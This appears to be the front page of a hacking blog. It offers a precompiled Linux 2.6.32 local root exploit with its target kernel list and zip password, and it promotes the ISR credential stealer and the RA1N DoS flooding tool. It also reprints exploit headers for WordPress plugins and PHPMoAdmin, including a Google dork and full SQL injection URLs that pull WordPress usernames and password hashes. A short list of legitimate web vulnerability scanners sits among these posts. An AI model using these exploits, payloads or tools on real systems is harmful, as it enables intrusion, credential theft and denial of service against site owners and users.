Local Root Exploit For Linux Kernel 2.6.32 (precompile)

Note: 
Its a pre-compiled exploit and has been verified for list servers. It might working on other 2.6.32-X kernels too. So, test it and update us in comments. Thanks.
Following is the list of vulnerable kernels which can be rooted with our exploit.

Vulnerable Kernels:

Linux localhost.domain 2.6.32-358.2.1.el6.x86_64 #1 SMP Wed Mar 13 00:26:49 UTC 2013 x86_64

Linux localhost.domain 2.6.32-358.6.1.el6.x86_64 #1 SMP Tue Apr 23 19:29:00 UTC 2013 x86_64

Linux localhost.domain 2.6.32-279.19.1.el6.x86_64 #1 SMP Wed Dec 19 07:05:20 UTC 2012 x86_64

Linux localhost.domain 2.6.32-279.22.1.el6.x86_64 #1 SMP Wed Feb 6 03:10:46 UTC 2013 x86_64

Linux localhost.domain 3.2.2-ipprojects #4 SMP Fri Feb 3 15:53:51 CET 2012 x86_64

Linux localhost.domain 2.6.32-042stab076.5 #1 SMP Mon Mar 18 20:41:34 MSK 2013 x86_64

Linux localhost.domain 2.6.32-220.4.1.el6.x86_64 #1 SMP Tue Jan 24 02:13:44 GMT 2012 x86_64

Linux localhost.domain 2.6.32-379.22.1.lve1.2.17.el6.x86_64 #1 SMP Wed Apr 3 12:05:42 EEST 2013 x86_64

Linux localhost.domain 2.6.32-042stab068.8 #1 SMP Fri Dec 7 17:06:14 MSK 2012 x86_64

Linux localhost.domain 2.6.32-379.22.1.lve1.2.14.el6.x86_64 #1 SMP Wed Mar 6 15:12:30 EET 2013 x86_64

Linux localhost.domain 2.6.32-379.19.1.lve1.2.6.el6.x86_64 #1 SMP Fri Jan 18 10:16:30 EST 2013 x86_64

Linux localhost.domain 2.6.32-042stab053.5 #1 SMP Tue Mar 27 11:42:17 MSD 2012 x86_64

Linux localhost.domain 2.6.32-279.el6.x86_64 #1 SMP Fri Jun 22 12:19:21 UTC 2012 x86_64

Linux localhost.domain 3.2.0-0.bpo.3-amd64 #1 SMP Thu Aug 23 07:41:30 UTC 2012 x86_64

Linux localhost.domain 2.6.32-358.0.1.el6.x86_64 #1 SMP Wed Feb 27 06:06:45 UTC 2013 x86_64

Linux localhost.domain 2.6.32-042stab061.2 #1 SMP Fri Aug 24 09:07:21 MSK 2012 x86_64

Linux localhost.domain 2.6.32-379.14.1.lve1.1.9.9.el6.x86_64 #1 SMP Thu Dec 6 07:12:24 EST 2012 x86_64

Linux localhost.domain 2.6.32-12-pve #1 SMP Tue May 15 06:02:20 CEST 2012 x86_64

Linux localhost.domain 2.6.32-131.21.1.el6.x86_64 #1 SMP Tue Nov 22 19:48:09 GMT 2011 x86_64

Linux localhost.domain 3.2.7 #1 SMP Sun Feb 26 23:00:18 CET 2012 x86_64

Linux localhost.domain 2.6.32-279.14.1.el6.x86_64 #1 SMP Tue Nov 6 23:43:09 UTC 2012 x86_64

Linux localhost.domain 2.6.32-379.22.1.lve1.2.17.el5h.x86_64 #1 SMP Wed Apr 3 14:28:52 EEST 2013 x86_64

Linux localhost.domain 2.6.32-320.4.1.lve1.1.4.el6.x86_64 #1 SMP Wed Mar 7 06:32:27 EST 2012 x86_64

Linux localhost.domain 2.6.32-220.7.1.el6.x86_64 #1 SMP Wed Mar 7 00:52:02 GMT 2012 x86_64

Linux localhost.domain 2.6.32-7-pve #1 SMP Mon Feb 13 07:33:21 CET 2012 x86_64

Linux localhost.domain 2.6.32-042stab062.2 #1 SMP Wed Oct 10 18:28:35 MSK 2012 x86_64

Linux localhost.domain 2.6.38 #5 SMP Sat Mar 19 13:19:08 CET 2011 x86_64

Linux localhost.domain 2.6.32 #1 SMP Wed Sep 5 22:46:20 MSK 2012 x86_64

Linux localhost.domain 2.6.32-379.19.1.lve1.2.7.el6.x86_64 #1 SMP Wed Jan 23 14:53:41 EST 2013 x86_64

Linux localhost.domain 3.2.0-0.bpo.2.dar-amd64 #1 SMP Fri Apr 27 18:23:24 MSK 2012 x86_64

Linux localhost.domain 2.6.32-16-pve #1 SMP Fri Nov 9 11:42:51 CET 2012 x86_64

Linux localhost.domain 2.6.32-220.17.1.el6.x86_64 #1 SMP Wed May 16 00:01:37 BST 2012 x86_64

Linux localhost.domain 2.6.32-279.9.1.el6.x86_64 #1 SMP Tue Sep 25 21:43:11 UTC 2012 x86_64

Linux localhost.domain 2.6.32-042stab065.3 #1 SMP Mon Nov 12 21:59:14 MSK 2012 x86_64

Linux localhost.domain 2.6.32-279.5.2.el6.x86_64 #1 SMP Fri Aug 24 01:07:11 UTC 2012 x86_64

Linux localhost.domain 2.6.32-11-pve #1 SMP Wed Apr 11 07:17:05 CEST 2012 x86_64

Linux localhost.domain 2.6.38-8-server #42-Ubuntu SMP Mon Apr 11 03:49:04 UTC 2011 x86_64

Linux localhost.domain 2.6.32-131.17.1.el6.x86_64 #1 SMP Thu Oct 6 19:24:09 BST 2011 x86_64

Linux localhost.domain 2.6.32-042stab072.10 #1 SMP Wed Jan 16 18:54:05 MSK 2013 x86_64

Linux localhost.domain 3.5.2 #1 SMP Thu Aug 23 17:07:20 CEST 2012 x86_64

Linux localhost.domain 2.6.32-220.el6.x86_64 #1 SMP Tue Dec 6 19:48:22 GMT 2011 x86_64

Linux localhost.domain 2.6.32-279.2.1.el6.x86_64 #1 SMP Fri Jul 20 01:55:29 UTC 2012 x86_64

Linux localhost.domain 3.2.20 #1 SMP Tue Aug 28 02:39:06 MSK 2012 x86_64

Linux localhost.domain 2.6.32-220.4.2.el6.x86_64 #1 SMP Tue Feb 14 04:00:16 GMT 2012 x86_64

Linux localhost.domain 2.6.32-279.5.1.el6.x86_64 #1 SMP Tue Aug 14 23:54:45 UTC 2012 x86_64

Linux localhost.domain 2.6.32-358.2.1.el6.x86_64 #1 SMP Wed Mar 13 00:26:49 UTC 2013 x86_64 GNU/Linux 

 Download here

Zip Password: *pakmadhunters* 

credit to  owner :)

Read More

Top 6 Web Vulnerability Scanner Tool

Web site security is very important because the website contain relevant information about a company and now a days website defacement is very common even a script kiddies and a new born hackers can do this. The most common vulnerability like SQL-Injection and cross site scripting lead towards the defacement.

So you want to secure your web application than find vulnerabilities on it before a hacker find it, try to use some relevant tools and find vulnerabilities and fix it. There are so many tools available for both Windows and Linux platform and commercial and open source tool. Below is the best web vulnerability scanner tool that we have discussed before.

OWASP Zed Attack Proxy- ZAP

OWASP or Open Web Application Security Project is a non profit organisation world wide that are focusing on improving the security of web application, for more about OWASP click here.The Zed Attack Proxy (ZAP) is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications. It has an automatic scanning functionality and it has a set of tools that allow you to find vulnerability manually.

Web Application Attack and Audit Framework (W3AF)

W3af is a Web Application Attack and Audit Framework. The project goal is to create a framework to find and exploit web application vulnerabilities that is easy to use and extend. w3af is working for Become the best Open Source Web Application Exploitation Framework. It is available on Backtrack 5 too.

Skipfish Web Vulnerability Scanner Tool

Skipfish is an automatic web application security tool, that has been designed to find the vulnerabilities on a web application, find vulnerability on your website before than a hacker find and exploit it. It is also available on Backtrack 5.

Nikto-Vulnerability Scanner

Nikto is one of the best open source web vulnerability scanner tool that is available on the famous Linux distribution like Backtrack, Gnacktrack,Backbox and others. You can use it on other distribution and on windows too because it is only need perl script.

Netsparker Web Application Security Scanner

Netsparker is a commercial tool that has been designed to find the vulnerabilities on web application, the free version of netparker is also available so you can download it and can use for a quick penetration testing on a web application.

Websecurify- Website Security Testing Tool

Websecurify is a cross operating system tool that can be run on Windows, Linux and MAC. It is the best tool to find the common web vulnerabilities that can cause a great harm to the web application.

This is just a small list of the best tools you can use Wapiti, Grendel scan and other tools to perform the job, you have any other tool in mind than do share it with us via comment box.

 
source : www.ehacking.net

Read More

ShellfireVPN [One of the best VPN]

[*] German IP Address

[*] For Windows

[*] Normal surfing

[*] Encrypted Internet

[*] Safe surfing hotspot

[*] Bypass firewalls

Download:  https://www.shellfire.de/

Read More

Wordpress Plugin Reflex Gallery - Arbitrary File Upload

Via->intelliegentexploit

Read More

Best Stealer Ever (ISR Stealer 0.4.1)

 

Video Tutorial: youtube

credit to uploader :)

Download : Mediafire

Read More

wordpress theme photocrati 4.X.X SQL INJECTION

# Exploit Title: [ wordpress theme photocrati 4.X.X SQL INJECTION ]
# Google Dork: [ Designed by Photocrati ] also [powered by Photocrati]
# Date: [23 / 09 / 2011 ]
# Exploit Author: [ ayastar ]
# Email : dmx-ayastar@hotmail.fr
# Software Link: [ http://www.photocrati.com ]
# Version: [4.X.X]
# Tested on: [ windows 7 ] 

details |
=======================================================
Software : photocrati
version : 4.X.X
Risk : High
remote : yes

attacker can do a remote injection in site URL to get some sensitive information .
=======================================================

Read More

PHPMoAdmin Remote Code Execution

######################################################################
#  _     ___  _   _  ____  ____    _  _____
#  | |   / _ \| \ | |/ ___|/ ___|  / \|_   _|
#  | |  | | | |  \| | |  _| |     / _ \ | |
#  | |__| |_| | |\  | |_| | |___ / ___ \| |
#  |_____\___/|_| \_|\____|\____/_/   \_\_|
#
# PHPMoAdmin Unauthorized Remote Code Execution (0-Day)
# Website : http://www.phpmoadmin.com/
# Exploit Author : @u0x (Pichaya Morimoto), Xelenonz, pe3z, Pistachio
# Release dates : March 3, 2015
#
# Special Thanks to 2600 Thailand group
# https://www.facebook.com/groups/2600Thailand/ , http://2600.in.th/
#
########################################################################
 
[+] Description
============================================================
PHPMoAdmin is a MongoDB administration tool for PHP built on a
stripped-down version of the Vork high-performance framework.
 

Read More

WordPress: Webdorado Spider Event Calendar <= 1.4.9 [SQL Injection]

# Exploit Title: WordPress: Webdorado Spider Event Calendar <= 1.4.9  [SQL Injection]
# Date: 2015-02-12
# Exploit Author: Mateusz Lach
# Vendor Homepage: https://www.facebook.com/WebDorado or http://www.webdorado.com
# Software Link: https://downloads.wordpress.org/plugin/spider-event-calendar.1.4.9.zip
# Version: 1.4.9
# Tested on: OpenSUSE Linux + Chrome and Firefox, it's PHP application.
# CVE : CWE-89
# OWASP Top10: A1-Injection

Google Dork-> /wp-admin/admin-ajax.php?action=spiderbigcalendar_month&theme_id=

define('FETCH_PREFIX_URL', 'http://%s/wp-admin/admin-ajax.php?action=spiderbigcalendar_month&theme_id=13&calendar=

1&select=month,list,week,day,&date=2015-02&many_sp_calendar=1&cur_page_url=%s&cat_id=1)%%20UNION%%20SELECT%%20%s,1,%%20FROM_UNIXTIME

(1423004400),1,(SELECT%%20CONCAT(CHAR(35,35,35,35),table_name,CHAR(35,35,35,35))%%20FROM%%20information_schema.tables%%20WHERE%%20table_name

%%20LIKE%%20(%%20SELECT%%20CHAR(37,%%20117,%%20115,%%20101,%%20114,%%20115)%%20)%%20LIMIT%%201),1,1,1,1,%%20CHAR(110,%%20111,

%%2095,%%20114,%%20101,%%20112,%%20101,%%2097,%%20116),1,1,1,1,1,1,1,1,1%%20FROM%%20DUAL;--%%20--%%20&widget=0');
 
define('FETCH_USERS_URL', 'http://%s/wp-admin/admin-ajax.php?action=spiderbigcalendar_month&theme_id=13&calendar=1&select=month,list,week,day,&date=

2015-02&many_sp_calendar=1&cur_page_url=%s&cat_id=1)%%20UNION%%20SELECT%%20%s,1,%%20FROM_UNIXTIME(1423004400),1,%%20CONCAT(CHAR

(35,33,35,33,35,33,35),GROUP_CONCAT(%%20CONCAT(%%20CONCAT(user_login,CHAR(35,%%2035),user_pass))),CHAR(35,33,35,33,35,33,35)),%%201,1,1,1,%%20CHAR

(110,%%20111,%%2095,%%20114,%%20101,%%20112,%%20101,%%2097,%%20116),1,1,1,1,1,1,1,1,1%%20as%%20fakeGroup

%%20FROM%%20%s%%20GROUP%%20BY%%20fakeGroup;--%%20&widget=0');

Read More

RA1N DoSer v4 (lite)

Flooding

• UDP
• TCP
• SYN

Features

• Port Scanning (100+ times faster than RDv3)
• History
• Favorites
• Awesome CPanel
• Defualts for input fields for flooding
• and more!

Tech Specs:

• Over 25kbs a UDP Flood
• Cusstomizable SYN Flooding (using exploitations)
• Encrypted source (noobs piss me off)
• TCP Flooding (very efficient)
• program averages only 5,000 kbs of processing

[x] Download ->  http://dl.dropbox.com
[x] Download ->  http://mediafire.com
 
[x] Virusscan ->
Code: https://www.virustotal.com/

credit : RA1N

Read More